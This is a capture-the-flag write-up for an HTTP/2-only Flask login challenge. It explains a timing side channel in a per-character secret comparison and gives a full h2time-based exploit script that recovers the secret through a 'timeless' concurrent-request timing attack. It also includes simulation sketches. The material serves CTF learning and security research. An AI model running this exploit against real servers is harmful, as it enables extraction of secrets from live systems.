WriteUp Source
Official WP
Challenge Topics
Solution
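This challenge is adapted from spaceless spacing in WCTF2020.
The challenge exposes only HTTP/2 on port 80 and does not support upgrading from HTTP/1.1, so a browser cannot open it directly. It has to be requested with plain HTTP/2 that skips the HTTP/1.1 upgrade (prior knowledge):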
    curl --http2-prior-knowledge IP/
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Login</title>
        <link rel="stylesheet" type="text/css" href="/static/login.css" />
    </head>
    <body>
        <div id="login">
            <h1>Login</h1>
            <form method="post">
                <input type="password" required="required" placeholder="口令" name="secret"></input>
                <button class="but" type="submit">登录</button>
            </form>
        </div>
    </body>
    </html>
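As a rough illustration of what "prior knowledge" means on the wire: the client skips the HTTP/1.1 `Upgrade: h2c` handshake and opens the cleartext connection directly with the fixed 24-byte HTTP/2 connection preface, followed by a SETTINGS frame. The sketch below only builds those bytes. The helper names `settings_frame` and `client_hello` are made up for this example, and nothing is sent over the network.

```python
import struct

# Fixed client connection preface defined by the HTTP/2 specification.
CLIENT_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"


def settings_frame(payload: bytes = b"") -> bytes:
    """Build a SETTINGS frame (type 0x4) on stream 0 with no flags set."""
    length = len(payload)
    # 9-byte frame header: 24-bit length, 8-bit type, 8-bit flags, 32-bit stream id field.
    header = struct.pack(">I", length)[1:] + bytes([0x4, 0x0]) + struct.pack(">I", 0)
    return header + payload


def client_hello() -> bytes:
    """First bytes a prior-knowledge client writes to the socket."""
    return CLIENT_PREFACE + settings_frame()


if __name__ == "__main__":
    print(client_hello())
```

A server that speaks only HTTP/2 expects exactly this opening, which is why an ordinary HTTP/1.1 request from a browser gets no usable answer.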
The page served at / is a login form that hints at /src; requesting /src returns the source code:
    import os
    import time
    import hashlib
    from flask import Flask, render_template, request

    app = Flask(__name__)

    FLAG = os.environ["ICQ_FLAG"]
    SECRET = hashlib.sha1(FLAG.encode()).hexdigest()[:10] + "test"
    SLEEP_TIME = 10 ** -3


    @app.route("/", methods=['POST', 'GET'])
    def login():
        if request.method == 'GET':
            return render_template('login.html')
        else:
            secret = request.form['secret']
            if len(secret) != len(SECRET):
                return "^_^"
            for a, b in zip(secret, SECRET):
                if a == "*":
                    continue
                elif a != b:
                    return "INCORRECT"
                else:
                    time.sleep(SLEEP_TIME)
            if "*" in secret:
                return "INCORRECT"
            return FLAG


    @app.route("/src")
    def src():
        with open(__file__) as f:
            return f.read()
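The backend takes the first 10 characters of the SHA-1 hex digest of the flag and appends "test" to form SECRET. The login endpoint first rejects any input whose length differs from SECRET with "^_^", then compares the submitted secret against SECRET character by character: if a character is "*" it is skipped, if it differs the endpoint returns INCORRECT at once, and if it matches the server sleeps for 1 millisecond. If the loop finishes but the input still contains "*", INCORRECT is returned; only a fully correct input returns the flag.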
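To make the side channel concrete, here is a minimal offline sketch that replays the same comparison but counts the sleeps instead of performing them. The function name `check` and the sample value `0123456789test` are assumptions for illustration only; the real SECRET is unknown.

```python
SLEEP_TIME = 10 ** -3  # same 1 ms delay as in the challenge source


def check(secret: str, real: str):
    """Replay the server's comparison; return (response, number_of_sleeps)."""
    if len(secret) != len(real):
        return "^_^", 0
    sleeps = 0
    for a, b in zip(secret, real):
        if a == "*":
            continue          # wildcard: skipped, no delay
        elif a != b:
            return "INCORRECT", sleeps
        else:
            sleeps += 1       # the server would call time.sleep(SLEEP_TIME) here
    if "*" in secret:
        return "INCORRECT", sleeps
    return "FLAG", sleeps


if __name__ == "__main__":
    real = "0123456789test"   # made-up stand-in for SECRET
    for guess in ["short", "*" * 13 + "x", "*" * 13 + "t", "*" * 12 + "st", real]:
        response, sleeps = check(guess, real)
        print(f"{guess!r:18} -> {response:9} after {sleeps} sleep(s)")
```

Both wildcard guesses that end correctly still answer INCORRECT, so the response body leaks nothing; only the number of sleeps, and therefore the response time, differs.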
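HTTP/2 multiplexes many requests over a single long-lived TCP connection. A paper presented at USENIX Security 2020, Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections, describes a technique called the Timeless Timing Attack. Roughly, the final frames of two requests are packed into the same TCP packet so that both reach the server at the same time, and the order in which the responses come back reveals whether a sleep occurred. The authors published their attack tooling on GitHub: https://github.com/DistriNet/timeless-timing-attacks.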
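The ordering idea can be tried locally with a toy model. This is only a simulation under stated assumptions: `fake_handler` and `race` are hypothetical names, the "server" is an asyncio coroutine rather than the challenge, the sample secret is made up, and the per-character delay is exaggerated to 20 ms so the ordering is stable on any machine. The real attack depends on HTTP/2 multiplexing, which is not modeled here.

```python
import asyncio

REAL = "0123456789test"   # made-up stand-in for SECRET
DELAY = 0.02              # exaggerated per-character delay for the simulation


async def fake_handler(name: str, guess: str, finished: list) -> None:
    """Imitate the login check, then record the order in which responses complete."""
    for a, b in zip(guess, REAL):
        if a == "*":
            continue
        if a != b:
            break
        await asyncio.sleep(DELAY)
    finished.append(name)


async def race(guess_a: str, guess_b: str) -> str:
    """Start both requests at the same moment; return the name of the one answered first."""
    finished: list = []
    await asyncio.gather(
        fake_handler("a", guess_a, finished),
        fake_handler("b", guess_b, finished),
    )
    return finished[0]


if __name__ == "__main__":
    baseline = "*" * 13 + "@"   # "@" can never match
    candidate = "*" * 13 + "t"  # matches the last character
    print(asyncio.run(race(baseline, candidate)))
```

Because both requests start together, no absolute timing is measured: the baseline request simply finishes first whenever the candidate triggered a sleep.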
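Recover the secret from back to front. With every position before the guessed character set to "*", a wrong guess returns immediately without sleeping, while a correct guess sleeps once for that character and once more for each already-recovered character after it, so the timing gap grows as more of the suffix is known.
The exploit is as follows: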
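The back-to-front strategy can be sketched offline as follows. This is a simplified model, not the network attack: it assumes the attacker can read the sleep count directly through a hypothetical `sleeps_for` oracle, whereas in practice that signal has to be inferred from response ordering. `recover`, `CHARSET`, and `BASELINE` are illustrative names.

```python
import string

CHARSET = string.ascii_lowercase + string.digits
BASELINE = "@"  # not in CHARSET, so it never matches a secret drawn from CHARSET


def sleeps_for(guess: str, real: str) -> int:
    """Number of sleeps the server's comparison loop would perform for this guess."""
    sleeps = 0
    for a, b in zip(guess, real):
        if a == "*":
            continue
        if a != b:
            break
        sleeps += 1
    return sleeps


def recover(real: str) -> str:
    """Recover `real` from back to front using only the sleep count as a side channel."""
    known = ""
    while len(known) < len(real):
        pad = "*" * (len(real) - len(known) - 1)
        baseline = sleeps_for(pad + BASELINE + known, real)  # always 0
        for char in CHARSET:
            # A correct char sleeps len(known) + 1 times; a wrong one sleeps 0 times.
            if sleeps_for(pad + char + known, real) > baseline:
                known = char + known
                break
        else:
            raise ValueError("no candidate in CHARSET matched")
    return known


if __name__ == "__main__":
    print(recover("0123456789test"))  # made-up stand-in for SECRET
```

Guessing from the front would not work the same way, since unknown positions after the guess cannot be padded with "*" without also removing the extra sleeps that amplify the signal.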
    import asyncio
    import time
    import string
    import logging
    from urllib.parse import urlparse

    from hyper import HTTP20Connection
    from h2time import H2Time, H2Request

    TIMING_ITERATIONS = 2
    NUM_REQUEST_PAIRS = 10
    SECRET_CHARSET = string.ascii_lowercase + string.digits
    COMPARISON_CHAR = "@"  # outside SECRET_CHARSET, so it never matches

    target = 'http://localhost:8803'

    logging.basicConfig(level=logging.INFO)
    logger = logging.getLogger("exploit")


    def get(resource):
        """Send a single POST and return the raw response body."""
        logging.disable(logging.INFO)
        try:
            # urlparse avoids str.lstrip(), which strips a character set rather than a prefix
            connection = HTTP20Connection(urlparse(target).netloc)
            connection.request("POST", "/", body=f"secret={resource}", headers={'Content-Type': 'application/x-www-form-urlencoded'})
            return connection.get_response().read()
        finally:
            logging.disable(logging.DEBUG)


    async def time_difference(a, b):
        """Race guesses a and b against each other and count which one answers first."""
        request_a = H2Request("POST", f"{target}/", {"user-agent": "h2time/0.1", 'Content-Type': 'application/x-www-form-urlencoded'}, f"secret={a}")
        request_b = H2Request("POST", f"{target}/", {"user-agent": "h2time/0.1", 'Content-Type': 'application/x-www-form-urlencoded'}, f"secret={b}")
        a_quicker_count = 0
        b_quicker_count = 0
        for _ in range(TIMING_ITERATIONS):
            # Run each pair in both orders to cancel out any bias from request order.
            # A negative result[0] is counted as the second request of the pair answering first.
            async with H2Time(
                request_a, request_b, num_request_pairs=NUM_REQUEST_PAIRS
            ) as h2t:
                results = await h2t.run_attack()
                b_quicker_count += len([result for result in results if result[0] < 0])
                a_quicker_count += len([result for result in results if result[0] >= 0])
            async with H2Time(
                request_b, request_a, num_request_pairs=NUM_REQUEST_PAIRS
            ) as h2t:
                results = await h2t.run_attack()
                a_quicker_count += len([result for result in results if result[0] < 0])
                b_quicker_count += len([result for result in results if result[0] >= 0])
        return a_quicker_count, b_quicker_count


    async def exploit():
        # The server answers "^_^" on a length mismatch, which leaks the secret length.
        secret_length = 1
        while get(COMPARISON_CHAR * secret_length) == b"^_^":
            secret_length += 1
        logger.info("")
        logger.info(f"Secret Length: {secret_length}")
        logger.info("")

        secret = ""
        for _ in range(secret_length):
            start = time.time()

            def spaced_secret_guess(guess):
                # Wildcards in front, the guessed character, then the known suffix.
                return "*" * (secret_length - len(secret) - 1) + guess + secret

            tasks = {
                char: asyncio.create_task(
                    time_difference(
                        spaced_secret_guess(COMPARISON_CHAR),
                        spaced_secret_guess(char)
                    )
                )
                for char in SECRET_CHARSET
            }
            await asyncio.gather(*tasks.values())

            # The correct character sleeps, so it is "quicker" the fewest times.
            lowest_char_quicker = None
            lowest_char_quicker_count = float("inf")
            for char, task in tasks.items():
                comparison_quicker_count, char_quicker_count = task.result()
                if char_quicker_count < lowest_char_quicker_count:
                    lowest_char_quicker = char
                    lowest_char_quicker_count = char_quicker_count
                logger.info(
                    f"Tested: {char + secret} -- {comparison_quicker_count} {char_quicker_count}"
                )

            secret = lowest_char_quicker + secret
            end = time.time()
            logger.info("")
            logger.info(f"Secret Progress: {secret}")
            logger.info(f"Secret Progress took: {end - start}s")
            logger.info("")

        correct = b"flag" in get(f"{secret}")
        logger.info("")
        logger.info(f"Secret: {secret}")
        logger.info(f"Correct: {correct}")
        logger.info("")


    asyncio.run(exploit())
Flag